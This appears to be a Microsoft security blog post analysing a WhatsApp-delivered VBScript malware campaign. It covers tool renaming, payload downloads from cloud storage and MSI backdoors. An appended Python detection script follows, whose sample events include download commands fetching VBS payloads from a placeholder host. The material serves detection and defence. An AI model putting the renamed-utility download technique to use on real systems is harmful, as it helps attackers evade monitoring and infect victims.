Tags: Backdoor, Multi-stage Malware, Social Engineering, VBScript Malware

Mar 31, 2026 • Microsoft Defender Security Research Team

WhatsApp malware campaign delivers VBScript and MSI backdoors


Source: Microsoft Security Blog
Category: malware
Severity: high

Executive Summary

Microsoft Security Experts identified a sophisticated malware campaign active since late February 2026 that leverages WhatsApp messages to deliver VBScript payloads initiating a multi-stage infection chain. The attack employs social engineering tactics, delivering malicious VBS files that establish persistence through renamed Windows utilities, cloud-hosted payloads on AWS, Tencent Cloud, and Backblaze B2, and UAC bypass techniques. The final stage deploys malicious MSI installers to maintain control over compromised systems. Organizations should monitor for PE metadata discrepancies, unusual VBS execution patterns, and registry modifications under HKLM\Software\Microsoft\Windows. Microsoft Defender can detect these threats by identifying files where names do not match embedded OriginalFileName metadata.

Summary

A malware campaign uses WhatsApp messages to deliver VBS scripts that initiate a multi-stage infection chain. The attack leverages renamed Windows tools and cloud-hosted payloads to install MSI backdoors and maintain persistent access to compromised systems.

Published Analysis

Microsoft Defender Experts observed a campaign beginning in late February 2026 that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files. Once executed, these scripts initiate a multi-stage infection chain designed to establish persistence and enable remote access. The campaign relies on a combination of social engineering and living-off-the-land techniques. It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system.

By combining trusted platforms with legitimate tools, the threat actor reduces visibility and increases the likelihood of successful execution.

Attack chain overview

This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting. The attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems.

Figure 1. Infection chain illustrating the execution flow of a VBS-based malware campaign.

Stage 1: Initial Access via WhatsApp

The campaign begins with the delivery of malicious Visual Basic Script (VBS) files through WhatsApp messages, exploiting the trust users place in familiar communication platforms. Once executed, these scripts create hidden folders in C:\ProgramData and drop renamed versions of legitimate Windows utilities, such as curl.exe renamed as netapi.dll and bitsadmin.exe renamed as sc.exe. By disguising these tools under misleading names, attackers ensure they blend seamlessly into the system environment.

Notably, these renamed binaries retain their original PE (Portable Executable) metadata, including the OriginalFileName field, which still identifies them as curl.exe and bitsadmin.exe. This means Microsoft Defender and other security solutions can use this metadata discrepancy as a detection signal, flagging instances where a file's name does not match its embedded OriginalFileName. In environments where PE metadata inspection is not actively monitored, defenders may instead need to rely on command-line flags and network telemetry to hunt for this activity. The scripts execute these utilities with downloader flags, initiating the retrieval of additional payloads.

Stage 2: Payload Retrieval from Cloud Services

After establishing a foothold, the malware advances to its next phase: downloading secondary droppers such as auxs.vbs and WinUpdate_KB5034231.vbs. These files are hosted on trusted cloud platforms such as AWS S3, Tencent Cloud, and Backblaze B2, which attackers exploit to mask malicious activity as legitimate traffic.

In the script shown in Figure 2, the VBS file copies legitimate Windows utilities (curl.exe, bitsadmin.exe) into a hidden folder under C:\ProgramData\EDS8738, renaming them as netapi.dll and sc.exe respectively. Using these renamed binaries with downloader flags, the script retrieves secondary VBS payloads (auxs.vbs, 2009.vbs) from cloud-hosted infrastructure. This technique allows malicious network requests to blend in as routine system activity.

Figure 2. Next-stage payload retrieval mechanism.

By embedding their operations within widely used cloud services, adversaries make it difficult for defenders to distinguish between normal enterprise activity and malicious downloads. This reliance on cloud infrastructure demonstrates a growing trend in cybercrime, where attackers weaponize trusted technologies to evade detection and complicate...
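The two detection signals described for Stage 1 and Stage 2 (an on-disk name that disagrees with the PE OriginalFileName, and a renamed tool run with downloader flags from a script host) can be checked over process-creation telemetry. The following is an added example, not code from the Microsoft post; the field names mimic Sysmon Event ID 1, the sample events are constructed, and the URLs are placeholders.

```python
"""Added example (not from the Microsoft post): triage process-creation
events for renamed Windows utilities and downloader flags. Sample events are
constructed; field names mimic Sysmon Event ID 1."""
import ntpath

# Tools the campaign renames, keyed by PE OriginalFileName, with the real
# curl/bitsadmin switches that make each act as a downloader.
DOWNLOADER_FLAGS = {
    "curl.exe": {"-o", "--output", "-O", "--remote-name"},
    "bitsadmin.exe": {"/transfer"},
}

def name_mismatch(image, original_filename):
    # On-disk name differs from OriginalFileName (case-insensitive).
    if not original_filename:          # no version resource: no verdict
        return False
    return ntpath.basename(image).lower() != original_filename.lower()

def uses_downloader_flags(original_filename, command_line):
    flags = DOWNLOADER_FLAGS.get(original_filename.lower(), set())
    return any(tok in flags for tok in command_line.split())

def triage(event):
    # Return findings for one event; an empty list means nothing notable.
    image, orig = event["Image"], event.get("OriginalFileName", "")
    findings = []
    if name_mismatch(image, orig):
        findings.append(f"{ntpath.basename(image)} is a renamed {orig}")
        if image.lower().startswith("c:\\programdata\\"):
            findings.append("renamed tool staged under C:\\ProgramData")
    if uses_downloader_flags(orig, event.get("CommandLine", "")):
        findings.append(f"{orig} used with downloader flags")
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if findings and parent in {"wscript.exe", "cscript.exe"}:
        findings.append("launched by a script host (VBS chain)")
    return findings

def high_confidence(event):
    # Renamed binary plus downloader flags: the pattern the post describes.
    f = triage(event)
    return any("renamed" in x for x in f) and any("downloader" in x for x in f)

SAMPLE_EVENTS = [  # constructed; URLs are placeholders
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.invalid/ -o page.html",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\EDS8738\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": "netapi.dll -o auxs.vbs https://example.invalid/auxs.vbs",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\ProgramData\EDS8738\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "sc.exe /transfer j /download https://example.invalid/a 2009.vbs",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
]
```

A legitimate curl download from System32 yields only the low-confidence flag finding, while the two renamed tools under C:\ProgramData\EDS8738 accumulate all four findings.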